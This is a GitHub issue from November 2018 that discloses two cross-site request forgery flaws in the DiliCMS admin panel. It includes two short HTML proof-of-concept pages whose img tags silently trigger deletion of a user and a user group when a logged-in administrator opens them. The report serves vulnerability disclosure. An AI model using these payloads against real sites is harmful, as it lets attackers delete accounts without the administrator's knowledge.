Skip to content
This repository was archived by the owner on Jan 10, 2019. It is now read-only.
This repository was archived by the owner on Jan 10, 2019. It is now read-only.

There is two CSRF vulnerability that can delete user or usergroup #60

Open
Open
There is two CSRF vulnerability that can delete user or usergroup#60
@Rich4ever

Description

@Rich4ever
Rich4ever
opened on Nov 11, 2018

Software Link : https://github.com/chekun/DiliCMS
After the administrator logged in,open the page
test.html delete user POC:

<html>  
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
</body>
</html>

test2.html delete group POC:

  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
</body>
</html>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions